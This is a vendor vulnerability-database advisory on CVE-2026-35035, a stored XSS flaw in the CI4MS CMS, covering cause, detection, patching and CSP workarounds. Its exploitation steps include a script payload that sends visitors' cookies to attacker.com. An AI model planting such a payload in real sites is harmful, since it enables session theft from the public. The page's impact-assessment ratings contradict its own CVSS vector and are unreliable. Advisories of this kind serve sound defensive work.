Join the Cyber Forum: Threat Intel on May 12, 2026 to learn how AI is reshaping threat defense.Join the Virtual Cyber Forum: Threat IntelRegister Now
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-35035

CVE-2026-35035: CI4MS CodeIgniter CMS XSS Vulnerability

CVE-2026-35035 is a stored cross-site scripting vulnerability in CI4MS, a CodeIgniter 4-based CMS, affecting public-facing pages through unsanitized system settings. This article covers technical details, impact, and patches.

Published: April 10, 2026

CVE-2026-35035 Overview

CVE-2026-35035 is a Stored Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton designed for production-ready modular architecture with RBAC authorization and theme support. The vulnerability exists in the System Settings – Company Information functionality, where several administrative configuration fields fail to properly sanitize user-controlled input before storing it in the database. When this data is subsequently rendered on public-facing pages such as the main landing page, it is output without proper encoding, allowing malicious scripts to execute in visitors' browsers.

Critical Impact

Attackers with administrative access can inject persistent malicious scripts that execute in the browsers of all public website visitors, potentially leading to credential theft, session hijacking, and defacement of public-facing pages.

Affected Products

  • CI4MS versions prior to 0.31.2.0
  • CI4MS CMS public-facing pages (main landing page)
  • Websites using CI4MS Company Information system settings

Discovery Timeline

  • 2026-04-06 - CVE CVE-2026-35035 published to NVD
  • 2026-04-08 - Last updated in NVD database

Technical Details for CVE-2026-35035

Vulnerability Analysis

This Stored Cross-Site Scripting vulnerability occurs due to improper output encoding in CI4MS. The application accepts user-controlled input through administrative configuration fields in the System Settings – Company Information section. This input is persisted to the database without adequate sanitization and is later rendered on public-facing pages without proper output encoding.

The attack surface is notable because it requires elevated privileges to exploit—an attacker must have administrative access to modify the Company Information settings. However, the impact is amplified because the malicious payload executes on public-facing pages viewed by all site visitors, not within the administrative dashboard itself. This creates a scenario where a compromised admin account or a malicious insider could weaponize the CMS to attack the general public.

Root Cause

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The application fails to implement proper output encoding when rendering Company Information data on public-facing templates. While the data may be stored as-is in the database, the critical failure occurs at the point of output where the stored values are inserted into HTML without escaping special characters like <, >, ", and &.

Attack Vector

The attack is network-based and requires high privileges (administrative access) to execute. An attacker with administrative credentials can navigate to the System Settings – Company Information section and inject malicious JavaScript payloads into vulnerable fields such as company name, address, or contact information. Once saved, these payloads are stored in the database and executed every time a visitor loads the public-facing pages where this information is displayed.

The exploitation flow involves:

  1. Attacker gains administrative access to the CI4MS dashboard
  2. Attacker navigates to System Settings – Company Information
  3. Attacker injects malicious JavaScript in configuration fields (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>)
  4. The payload is stored in the database
  5. Public visitors loading the main landing page trigger script execution
  6. Attacker harvests cookies, credentials, or performs other malicious actions

For detailed technical information and proof of concept, refer to the GitHub Security Advisory.

Detection Methods for CVE-2026-35035

Indicators of Compromise

  • Unusual JavaScript code or HTML tags present in database records for company information settings
  • Unexpected external script references in page source code on public-facing pages
  • Reports from users about suspicious browser behavior or redirects when visiting the site
  • Web application firewall (WAF) logs showing XSS pattern matches in responses

Detection Strategies

  • Deploy web application firewall rules to detect XSS patterns in HTTP responses served to public visitors
  • Implement Content Security Policy (CSP) headers with strict script-src directives to prevent inline script execution
  • Conduct regular database audits to identify suspicious content in configuration tables
  • Monitor network traffic for unusual outbound connections originating from client browsers

Monitoring Recommendations

  • Enable detailed logging for all administrative actions, particularly changes to system settings
  • Configure SIEM alerts for HTML/JavaScript patterns in configuration database fields
  • Implement real-time monitoring of page integrity using subresource integrity checks
  • Review access logs for unusual patterns of administrative login activity

How to Mitigate CVE-2026-35035

Immediate Actions Required

  • Upgrade CI4MS to version 0.31.2.0 or later immediately
  • Audit existing Company Information settings for any suspicious or malicious content
  • Review administrative user accounts and enforce strong authentication (MFA)
  • Implement Content Security Policy headers as a defense-in-depth measure

Patch Information

The vulnerability has been addressed in CI4MS version 0.31.2.0. The fix implements proper output encoding for Company Information data when rendered on public-facing pages. Organizations should upgrade to this version or later to remediate the vulnerability. For additional details, see the GitHub Security Advisory.

Workarounds

  • Implement strict Content Security Policy headers that block inline JavaScript execution (e.g., script-src 'self')
  • Manually sanitize existing Company Information database entries to remove any suspicious content
  • Restrict administrative access to trusted users only and implement IP-based access controls for the admin panel
  • Deploy a web application firewall with XSS detection rules to filter malicious output
bash
# Example Content Security Policy header configuration for Apache
# Add to .htaccess or Apache configuration
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; object-src 'none'; frame-ancestors 'self';"

# Example for Nginx
# Add to server block configuration
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; object-src 'none'; frame-ancestors 'self';";

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS

  • Vendor/TechCodeigniter

  • SeverityHIGH

  • CVSS Score7.2

  • EPSS Probability0.07%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CWE References
  • CWE-79
  • Technical References
  • GitHub Security Advisory
  • Related CVEs
  • CVE-2026-39390: CI4MS CodeIgniter CMS XSS Vulnerability

  • CVE-2026-34989: CI4MS CMS Stored XSS Vulnerability

  • CVE-2026-34560: CI4MS CodeIgniter CMS XSS Vulnerability

  • CVE-2026-34562: CI4MS CodeIgniter CMS XSS Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English